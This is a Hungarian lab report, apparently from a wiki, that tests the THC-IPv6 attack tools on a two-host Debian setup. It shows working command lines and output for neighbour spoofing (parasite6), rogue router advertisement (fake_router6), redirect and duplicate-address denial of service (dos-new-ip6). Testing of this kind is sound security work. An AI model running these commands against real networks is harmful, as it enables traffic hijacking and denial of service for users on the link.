IPv6 specifikus hacking eszközök

A [http://freeworld.thc.org/thc-ipv6/ THC-IPv6] eszközkészlet célja különböző támadások megvalósítása, specifikusan az IPv6 protokollt célozva. A készlet a követekző eszközöket tartamazza:

A csomag telepítése

A teszt Debian Linux alatt történt, a telepítés csomagból történt. A következő lényeges csomagokat kellett telepíteni, az apt-get install ... csomagkezelő használatával: gcc, libc6, libc-dev, libpcap-dev, libssl-dev. Ezek után a THC forrásból fordítható.

THC tesztek

Képernyőképek

Alive6

./alive6 eth0 Alive: fe80:0000:0000:0000:020c:29ff:fed8:f478 Found 1 systems alive Sikeresen felismerte a másik Linux-os gép Link Local IP címét.

=== Parasite6 === A spoofingot végző hoszt IP címei: ip -6 addr 1: lo: <LOOPBACK,UP> mtu 16436

2: eth0: <BROADCAST,MULTICAST,UP> mtu 1492 qlen 1000

Minden forgalom átirányítása saját maga felé, ezzel egyidőben a másik gépen ping6 forgalmat generalok, hogy legyen mit eltéríteni (ping6 fec0::3 -I eth0, ping6 fec0::4 -I eth0):

./parasite6 eth0 Remember to enable routing (ip_forwarding), you will denial service otherwise! Started ICMP6 Neighbor Solitication Interceptor (Press Control-C to end) ... Spoofed packet to fec0:0000:0000:0000:0000:0000:0000:0002 as fec0:0000:0000:0000:0000:0000:0000:0001 Spoofed packet to fe80:0000:0000:0000:0219:e0ff:fe14:6503 as fec0:0000:0000:0000:0000:0000:0000:0002 Spoofed packet to fe80:0000:0000:0000:020c:29ff:fed8:f478 as fe80:0000:0000:0000:0219:e0ff:fe14:6503 Spoofed packet to fe80:0000:0000:0000:0219:e0ff:fe14:6503 as fe80:0000:0000:0000:020c:29ff:fed8:f478 Spoofed packet to fec0:0000:0000:0000:0000:0000:0000:0002 as fec0:0000:0000:0000:0000:0000:0000:0003 Spoofed packet to fec0:0000:0000:0000:0000:0000:0000:0002 as fec0:0000:0000:0000:0000:0000:0000:0004

A másik gépen ezután több fals szomszéd is látszik: ip -6 neigh fec0::4 dev eth0 lladdr 00:19:e0:14:65:03 STALE fec0::3 dev eth0 lladdr 00:19:e0:14:65:03 STALE

Fake_router6

Előtte: ip -6 route fe80::/64 dev eth0 metric 256 expires 21332474sec mtu 1492 advmss 1432 hoplimit 4294967295 fec0::/124 dev eth0 metric 256 expires 21332933sec mtu 1492 advmss 1432 hoplimit 4294967295 ff00::/8 dev eth0 metric 256 expires 21332474sec mtu 1492 advmss 1432 hoplimit 4294967295 unreachable default dev lo proto none metric -1 error -101 hoplimit 255

Jöhet a fals route beinjektálása: ./fake_router6 eth0 fe80::1 2001:2001::/32 1500 Starting to advertise router fe80::1 (Press Control-C to end) ...

Ezután a másik gép routing táblája: ip -6 route 2001:2001::/32 dev eth0 proto kernel metric 256 expires 8590469sec mtu 1492 advmss 1432 hoplimit 4294967295 fe80::/64 dev eth0 metric 256 expires 21332362sec mtu 1492 advmss 1432 hoplimit 4294967295 fec0::/124 dev eth0 metric 256 expires 21332821sec mtu 1492 advmss 1432 hoplimit 4294967295 ff00::/8 dev eth0 metric 256 expires 21332362sec mtu 1492 advmss 1432 hoplimit 4294967295 default via fe80::1 dev eth0 proto kernel metric 1024 expires 65538sec mtu 1492 advmss 1432 hoplimit 255 unreachable default dev lo proto none metric -1 error -101 hoplimit 255

Látható, hogy valóban bekerült az új routing bejegyzés.

Redir6

Előtte: ip -6 route fe80::/64 dev eth0 metric 256 expires 21331811sec mtu 1492 advmss 1432 hoplimit 4294967295 fec0::/124 dev eth0 metric 256 expires 21332270sec mtu 1492 advmss 1432 hoplimit 4294967295 fec0::1:1 via fec0::5 dev eth0 metric 1024 expires 21334372sec mtu 1492 advmss 1432 hoplimit 4294967295 ff00::/8 dev eth0 metric 256 expires 21331811sec mtu 1492 advmss 1432 hoplimit 4294967295 unreachable default dev lo proto none metric -1 error -101 hoplimit 255 Felvettem egy routot egy fec0::1:1 címre, ezt akarom majd eltéríteni. ./redir6 eth0 fec0::2 fec0::1:1 fec0::5 fec0::1 Nem lett új route bejegyzés, de érdemes megnézni a capture fájlt. Valószínűleg a routerek hiánya miatt nem sikerült eltéríteni.

Dos-new-ip6

./dos-new-ip6 eth0 Started ICMP6 DAD Denial-of-Service (Press Control-C to end) ... Spoofed packet for existing ip6 as fe80:0000:0000:0000:0000:0000:0000:0001 Spoofed packet for existing ip6 as fe80:0000:0000:0000:0000:0000:0000:0002 Spoofed packet for existing ip6 as fe80:0000:0000:0000:020c:29ff:fed8:f478 Valóban nem enged új interfészeket feljönni a linkre.

A detect-new-ip6 gyakoraltilag ugyanazt csinálja, mint az alive6.

A smurf6 attack-ot nem lehet egy ilyen kicsi hálózat esetén kipróbálni (tulajdonképpen két ipv6 eszközvolt a próba során összekötve). A Debian nem reagált sem a smurf, sem a sendpees támadásra, csak a kérések láthatóak a vonalon. Az önkéntes Neighbor Advertisementre a másik gép nem reagál, nem írja be a szomszédok közé a hírdetett IP-t.